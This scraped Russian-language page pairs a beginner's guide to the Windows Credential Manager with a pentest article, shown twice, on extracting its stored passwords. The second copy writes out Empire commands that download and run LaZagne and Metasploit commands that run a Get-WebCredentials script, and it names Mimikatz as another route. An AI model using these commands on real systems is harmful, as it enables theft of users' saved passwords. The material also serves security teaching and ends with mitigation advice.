- «Диспетчер учетных данных» – место, в котором Windows хранит пароли и другие данные для входа
- «Диспетчер учетных данных» – место, в котором Windows хранит пароли и другие данные для входа
- Виджеты на рабочий стол
- В Экселе не двигается курсор по ячейкам: в чем может быть проблема?
- Не работает правая кнопка мыши в Excel: где кроется проблема?
- Не работает фильтр в Excel: загвоздка, на которую мы часто не обращаем внимания
- Не отображаются листы в Excel: как вернуть вкладки без танцев с бубнами
- Что такое «Диспетчер учетных данных»?
- Учетные данные разделены на три категории:
- Как открыть «Диспетчер учетных данных»?
- Наиболее распространенные учетные данные
- Добавление учетных данных
- Удаление учетных данных
- Редактирование существующих учетных данных
- Заключение
- Получение учетных данных: Windows Credential Manager
- Знакомство с Credential Manager
- Получение доступа к Credential Manager
- Metasploit
- Empire
- CredentialsFileView
- Windows PowerShell
- Митигирование
- Получение учетных данных: Windows Credential Manager
- Знакомство с Credential Manager
- Получение доступа к Credential Manager
- Metasploit
- Empire
- CredentialsFileView
- Windows PowerShell
- Митигирование
«Диспетчер учетных данных» – место, в котором Windows хранит пароли и другие данные для входа
«Диспетчер учетных данных» – место, в котором Windows хранит пароли и другие данные для входа
Виджеты на рабочий стол
В Экселе не двигается курсор по ячейкам: в чем может быть проблема?
Не работает правая кнопка мыши в Excel: где кроется проблема?
Не работает фильтр в Excel: загвоздка, на которую мы часто не обращаем внимания
Не отображаются листы в Excel: как вернуть вкладки без танцев с бубнами
Бьюсь об заклад, почти никто из вас не слышал о «Диспетчере учетных данных», не говоря уже о том, что это такое и как его использовать. Впрочем, до недавнего времени назначение этого инструмента оставалось загадкой и для меня, хотя и знал о его существовании. В этой статье я расскажу все, что мне известно о нем и как его использовать.
Что такое «Диспетчер учетных данных»?
«Диспетчер учетных данных» – это «цифровой сейф», в котором Windows хранит учетные данные (имя пользователя, пароли и т.д.) для других компьютеров в сети, серверов или веб-сайтов. Эти данные использует как сама операционная система, так и приложения, которые знают, как их использовать, например: инструменты, входящие в состав Windows Live Essentials, Microsoft Office, Internet Explorer или приложения для запуска виртуальных машин.
Учетные данные разделены на три категории:
- «Учетные данные Windows» – используются только Windows и ее службами. К примеру, Windows может использовать эти данные для автоматического входа в общие папки на другом компьютере в вашей сети. Или, для хранения пароля домашней группы, к которой вы присоединены. Пользователь может изменять или удалять такие учетные данные, но это мы затронем в последующих разделах данное статьи.
- «Учетные данные на основе сертификата» – они используются вместе со смарт-картами, в основном в сложных сетевых бизнес-средах. Большинству из вас никогда не потребуется использовать эти учетные данные и этот раздел на ваших компьютерах будет пуст, но если вы хотите узнать о них больше, почитайте эту статью от Microsoft.
- «Общие учетные данные» – используются некоторыми программами для получения разрешения на использование определенных ресурсов. Самыми часто используемыми общими учетными данными является Windows Live ID, который используется программами, включенными в пакет Windows Live Security Essentials.
Все эти учетные данные автоматически сохраняются и управляются Windows и приложениями, которые вы используете. Для просмотра учетных данных, хранящихся на компьютере, или для удаления или редактирования некоторых из них, используется «Диспетчер учетных данных».
«Учетные данные для Интернета» создаются и удаляются через встроенные в Internet Explorer функции для управления паролями. Вы не сможете создавать эти данные через «Диспетчер учетных данных» – можно только просматривать существующие и удалять их.
Как открыть «Диспетчер учетных данных»?
Один из способов открытия «Диспетчера учетных данных»: откройте «Панель управления», затем перейдите в раздел «Учетные записи пользователей и Семейная безопасность», ну а дальше выберите «Диспетчер учетных данных».
Наиболее распространенные учетные данные
На большинстве компьютеров с Windows 7 и Windows 8 вы увидите в основном одни и те же учетные данные. Среди наиболее распространенных:
- Детали для входа в домашнюю группу – здесь хранится имя пользователя (HomeGroupUser$) с паролем для доступа к домашней группе.
- virtualapp/didlogical – об этих учетных данных известно очень мало. Некоторые говорят, что они используются функциями виртуализации, включенными в Windows 7 и Windows 8.
- WindowsLive – данные для входа в Windows Live ID.
Добавление учетных данных
Процесс добавления учетных данных очень простой. Во-первых, определитесь с типом учетных данных. Как из трех вам нужен?
Предположим, вы хотите добавить «Учетные данные Windows» для того, чтобы вы могли открывать папки на другом компьютере.
Нажмите на ссылку «добавить учетные данные Windows».
Дальше вам нужно ввести необходимые данные для входа. Сначала введите IP-адрес или имя компьютера. Далее введите имя пользователя, которое будет использоваться для входа. Кстати, не забудьте ввести имя компьютера перед именем пользователя, как показано на скриншоте ниже. Теперь введите пароль и нажмите кнопку «OK».
Учетные данные сохраняться и будут автоматически использоваться при каждом доступе к данному компьютеру вашей сети.
Удаление учетных данных
Для удаления учетных данных, сперва найдите их и раскройте, кликнув на их название или на стрелку справа.
Затем нажмите на ссылку «Удалить».
Вас попросят подтвердить удаление. Нажмите на кнопку «Да».
Учетные данные удалены и больше не будут использоваться.
Редактирование существующих учетных данных
Чтобы изменить сведения о существующих учетных данных, как и в случае с удалением, найдите их и раскройте. Далее нажмите «Изменить».
После редактирования не забудьте нажать на кнопку «Сохранить», чтобы изменения вступили в силу.
Заключение
Как видим, «Диспетчер учетных данных» играет важную роль на вашем компьютере. Единственное, я пока не выяснил, насколько хорошо зашифрованы эти данные, поэтому буду и дальше изучать этот инструмент, и напишу о нем по крайней мере еще одну статью.
Получение учетных данных: Windows Credential Manager
В этой статье рассказывается о получении учетных данных из Windows Credential Manager, приводятся различные методы, которые могут быть использованы как во внутреннем, так и во внешнем пентестинге.
Знакомство с Credential Manager
Credential Manager (диспетчер учетных данных) был представлен впервые на Windows 7. Он похож на цифровое хранилище для хранения всех учетных данных пользователя в безопасности. Они расположены в папке учетных данных, которую можно найти здесь – %Systemdrive%\Users\ \AppData\Local\Microsoft\Credentials, и именно к этой папке обращается Credential Manager. Он также позволяет добавлять, редактировать, удалять, создавать резервные копии и даже восстанавливать пароли.
Учетные данные, сохраненные в Credential Manager, бывают двух типов:
- Веб-учетные данные: поскольку Edge и Windows являются продуктами одной и той же компании, Credential Manager также имеет доступ к хранящейся информации в браузере, чтобы повысить сохранность учетных данных. Он хранит пароли приложений, предоставленных Microsoft, например, Skype, Microsoft Office и т.д.
- Учетные данные Windows: здесь можно найти все учетные данные для входа в систему Windows. Это касается любой системы, которая подключена к сети.
Приложения, запущенные Windows и хранящие учетные данные пользователя, будут автоматически отображены в Credential Manager. Даже когда пользователь обновляет их, изменения моментально вносятся в диспетчер учетных данных.
Получение доступа к Credential Manager
Для получения доступа к диспетчеру учетных данных, пользователь может просто найти его в меню Пуск или открыть программу с помощью следующих двух методов:
- Панель управления > Учетные записи пользователей > Диспетчер учетных данных
- С помощью командной строки: ввести команду vaultcmd и воспользоваться ее возможностями
При имеющемся подключении к другой системе в сети можно использовать любой из способов, приведенных ниже.
При подключении, когда пользователь вводит пароль и сохраняет его для последующего использования, его учетные данные сохраняются в диспетчере учетных данных.
Независимо от веб-сайта и его политик безопасности, когда человек сохраняет пароль в Edge или любом другом приложении, таком как Skype или Outlook, эти данные также заносятся и в Credential Manager. Например, пользователь сохранил пароль от Gmail, как показано на рисунке ниже:
Теперь пользователь может убедиться в том, что пароль был действительно сохранен.
Пользователь получает доступ к Credential Manager, используя любой уже упомянутый метод. Он обнаруживает, что на вкладке учетные данные Windows хранятся все системные и сетевые пароли.
А на вкладке веб-учетные данные будут показаны пароли приложений и сохраненные в Еdge.
Metasploit
Все эти учетные данные могут быть получены с помощью простых методов. Как только был установлен сеанс Metasploit, все, что нужно сделать, это загрузить Mimikatz и запустить его. Mimikatz — это удивительный инструмент для получения учетных данных.
Чтобы запустить его удаленно с помощью сеанса Metasploit, следует использовать следующую команду:
Как только Mimikatz выполнит свою работу, пользователь получит учетные данные, сохраненные в Credential Manager, как показано на рисунке выше.
Empire
Аналогичным образом, с помощью Empire, пользователь может получить учетные данные путем загрузки Lazagne.exe непосредственно в целевую систему, а затем нужно манипулировать этой утилитой. LaZange – это один из самых популярных инструментов для получения учетных данных.
Нужно использовать следующие команды для сброса учетных данных с помощью этого метода:
После выполнения команд пользователь может увидеть, что пароли были получены, как показано на рисунке ниже:
CredentialsFileView
Следующий метод заключается в использовании стороннего инструмента – CredentialsFileView. Эта утилита очень эффективна, когда речь заходит о пентестинге. Чтобы использовать данный инструмент, следует просто скачать и запустить его. После запуска он запросит у пользователя пароль Windows.
Как только человек введет пароль, инструмент предоставит ему все необходимые учетные данные, как показано на рисунке ниже:
Windows PowerShell
Этот метод получения паролей может оказаться полезным как во внутреннем, так и во внешнем пентестинге. Во время него пользователь запускает скрипт в Windows PowerShell, его можно найти, перейдя по ссылке. Как только человек откроет скрипт, он получит все веб-учетные данные, как показано на картинке ниже:
Пользователь может применить PowerShell удаленно для получения учетных данных с помощью Metasploit. Это очень просто, так как всего лишь необходимо выполнить комбинацию следующих команд после завершения сеанса:
И с помощью команд PowerShell пользователь и получит нужные ему учетные данные.
Митигирование
Ниже приведены меры, которые могут быть использованы для обеспечения безопасности паролей пользователя:
- Не стоит хранить пароли в системе, браузере или любом другом приложении
- Следует использовать разные пароли для каждой учетной записи
- Если у пользователя возникли проблемы с запоминанием паролей, то вместо того, чтобы хранить их в виде открытого текста в системе, нужно использовать онлайн-менеджер паролей
- Надо загрузить последнюю версию операционной системы и приложений
- Вручную переходить на страницу входа в систему, а не по какой-то ссылке
- Постоянно пользоваться защитой межсетевого экрана
- Держать своих сотрудников или работодателей в курсе всех происходящих событий
Важно! Информация исключительно в учебных целях. Пожалуйста, соблюдайте законодательство и не применяйте данную информацию в незаконных целях.
Получение учетных данных: Windows Credential Manager
В этой статье рассказывается о получении учетных данных из Windows Credential Manager, приводятся различные методы, которые могут быть использованы как во внутреннем, так и во внешнем пентестинге.
Знакомство с Credential Manager
Credential Manager (диспетчер учетных данных) был представлен впервые на Windows 7. Он похож на цифровое хранилище для хранения всех учетных данных пользователя в безопасности. Они расположены в папке учетных данных, которую можно найти здесь – %Systemdrive%\Users\ \AppData\Local\Microsoft\Credentials , и именно к этой папке обращается Credential Manager. Он также позволяет добавлять, редактировать, удалять, создавать резервные копии и даже восстанавливать пароли.
Учетные данные, сохраненные в Credential Manager, бывают двух типов:
- Веб-учетные данные : поскольку Edge и Windows являются продуктами одной и той же компании, Credential Manager также имеет доступ к хранящейся информации в браузере, чтобы повысить сохранность учетных данных. Он хранит пароли приложений, предоставленных Microsoft, например, Skype, Microsoft Office и т.д.
- Учетные данные Windows : здесь можно найти все учетные данные для входа в систему Windows. Это касается любой системы, которая подключена к сети.
Приложения, запущенные Windows и хранящие учетные данные пользователя, будут автоматически отображены в Credential Manager. Даже когда пользователь обновляет их, изменения моментально вносятся в диспетчер учетных данных.
Получение доступа к Credential Manager
Для получения доступа к диспетчеру учетных данных, пользователь может просто найти его в меню Пуск или открыть программу с помощью следующих двух методов:
- Панель управления > Учетные записи пользователей > Диспетчер учетных данных
- С помощью командной строки: ввести команду vaultcmd и воспользоваться ее возможностями
При имеющемся подключении к другой системе в сети можно использовать любой из способов, приведенных ниже.
При подключении, когда пользователь вводит пароль и сохраняет его для последующего использования, его учетные данные сохраняются в диспетчере учетных данных.
Независимо от веб-сайта и его политик безопасности, когда человек сохраняет пароль в Edge или любом другом приложении, таком как Skype или Outlook, эти данные также заносятся и в Credential Manager. Например, пользователь сохранил пароль от Gmail, как показано на рисунке ниже:
Теперь пользователь может убедиться в том, что пароль был действительно сохранен.
Пользователь получает доступ к Credential Manager, используя любой уже упомянутый метод. Он обнаруживает, что на вкладке учетные данные Windows хранятся все системные и сетевые пароли.
А на вкладке веб-учетные данные будут показаны пароли приложений и сохраненные в Еdge.
Metasploit
Все эти учетные данные могут быть получены с помощью простых методов. Как только был установлен сеанс Metasploit, все, что нужно сделать, это загрузить Mimikatz и запустить его. Mimikatz – это удивительный инструмент для получения учетных данных.
Чтобы запустить его удаленно с помощью сеанса Metasploit, следует использовать следующую команду:
Как только Mimikatz выполнит свою работу, пользователь получит учетные данные, сохраненные в Credential Manager, как показано на рисунке выше.
Empire
Аналогичным образом, с помощью Empire, пользователь может получить учетные данные путем загрузки Lazagne.exe непосредственно в целевую систему, а затем нужно манипулировать этой утилитой. LaZange – это один из самых популярных инструментов для получения учетных данных.
Нужно использовать следующие команды для сброса учетных данных с помощью этого метода:
shell wget https://github.com/AlessandrZ/LaZagne/releases/download2.4.3/lazagne.exe -outfile lazagne.exe
shell wget
shell dir
shell ./lazagne.exe all
После выполнения команд пользователь может увидеть, что пароли были получены, как показано на рисунке ниже:
CredentialsFileView
Следующий метод заключается в использовании стороннего инструмента – CredentialsFileView. Эта утилита очень эффективна, когда речь заходит о пентестинге. Чтобы использовать данный инструмент, следует просто скачать и запустить его. После запуска он запросит у пользователя пароль Windows.
Как только человек введет пароль, инструмент предоставит ему все необходимые учетные данные, как показано на рисунке ниже:
Windows PowerShell
Этот метод получения паролей может оказаться полезным как во внутреннем, так и во внешнем пентестинге. Во время него пользователь запускает скрипт в Windows PowerShell, его можно найти, перейдя по ссылке . Как только человек откроет скрипт, он получит все веб-учетные данные, как показано на картинке ниже:
Пользователь может применить PowerShell удаленно для получения учетных данных с помощью Metasploit. Это очень просто, так как всего лишь необходимо выполнить комбинацию следующих команд после завершения сеанса:
load powershell
powershell_import /root/Get-WebCredentials.ps1
powershell_execute Get-WebCredentials
И с помощью команд PowerShell пользователь и получит нужные ему учетные данные.
Митигирование
Ниже приведены меры, которые могут быть использованы для обеспечения безопасности паролей пользователя:
- Не стоит хранить пароли в системе, браузере или любом другом приложении
- Следует использовать разные пароли для каждой учетной записи
- Если у пользователя возникли проблемы с запоминанием паролей, то вместо того, чтобы хранить их в виде открытого текста в системе, нужно использовать онлайн-менеджер паролей
- Надо загрузить последнюю версию операционной системы и приложений
- Вручную переходить на страницу входа в систему, а не по какой-то ссылке
- Постоянно пользоваться защитой межсетевого экрана
- Держать своих сотрудников или работодателей в курсе всех происходящих событий
Важно ! Информация исключительно в учебных целях. Пожалуйста, соблюдайте законодательство и не применяйте данную информацию в незаконных целях.